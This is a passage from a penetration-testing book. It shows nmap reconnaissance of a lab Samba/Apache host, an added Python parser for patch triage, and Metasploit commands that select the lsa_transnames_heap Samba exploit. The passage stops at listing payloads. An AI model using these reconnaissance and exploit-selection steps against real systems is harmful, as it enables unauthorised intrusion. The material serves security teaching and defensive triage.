The Joy of Exploitation
69
Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
. . . SNIP . . .
Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| Name: MSHOME\Unknown
|_ System time: 2011-03-15 17:39:57 UTC-4
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds
We see three open ports: 80, 139, and 445. The Apache banner on port 80 tells us that the system is running Ubuntu, and the banners on ports 139 and 445 show that it is running a version of Samba 3.x, alongside Apache 2.2.3 with PHP 5.2.1. The smb-os-discovery script result narrows the Samba build down to 3.0.24.
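From the defender's side the same scan is an inventory signal: the port banners only say "Samba 3.X", while the smb-os-discovery script pins the build to 3.0.24, and it is that exact version that decides whether the host needs patching or isolating before a module such as lsa_transnames_heap is even relevant. The parser below is an added example, not code from the book; it reads nmap's normal output (a constructed sample re-typed from the scan above), separates the coarse banner from the exact NSE-detected version, and returns the open Samba ports whenever the build falls in an assumed 3.0 branch.

```python
import re

# Constructed sample input: the scan above re-typed as nmap normal output
# (not the book's verbatim listing).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.33.132
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|_  System time: 2011-03-15 17:39:57 UTC-4
"""

# One row of the PORT/STATE/SERVICE/VERSION table.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# The smb-os-discovery line carrying the exact Samba build.
SMB_OS_RE = re.compile(r"^\|\s+OS:\s+.*\(Samba\s+([\d.]+)\)")

def parse_nmap(text):
    """Return (host, service rows, exact Samba version or None)."""
    host, services, samba_version = None, [], None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1]
            continue
        m = PORT_RE.match(line)
        if m:
            services.append({"port": int(m.group(1)), "proto": m.group(2),
                             "state": m.group(3), "service": m.group(4),
                             "version": m.group(5).strip()})
            continue
        m = SMB_OS_RE.match(line)
        if m:
            samba_version = m.group(1)
    return host, services, samba_version

def exposed_samba_ports(text, branch="3.0."):
    """Open Samba ports when the exact NSE-detected build starts with `branch`.
    The banner only says "3.X", so the decision uses smb-os-discovery. The 3.0
    default matches the chapter's 3.0.24 host; the cutoff is an assumption."""
    _, services, version = parse_nmap(text)
    if not version or not version.startswith(branch):
        return []
    return sorted(s["port"] for s in services
                  if s["state"] == "open" and "Samba" in s["version"])
```

Without the smb-os-discovery line the function returns an empty list rather than guessing from the "3.X" banner, which is the conservative choice for an automated patch-triage pass.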
Let’s search for a Samba exploit and try it against the system:
msf > search samba
[*] Searching loaded modules for pattern 'samba'...
Auxiliary
=========
Name                                Rank    Description
----                                ----    -----------
admin/smb/samba_symlink_traversal   normal  Samba Symlink Directory Traversal
dos/samba/lsa_addprivs_heap         normal  Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap       normal  Samba lsa_io_trans_names Heap Overflow
Exploits
========
Name                                Rank    Description
----                                ----    -----------
linux/samba/lsa_transnames_heap     good    Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads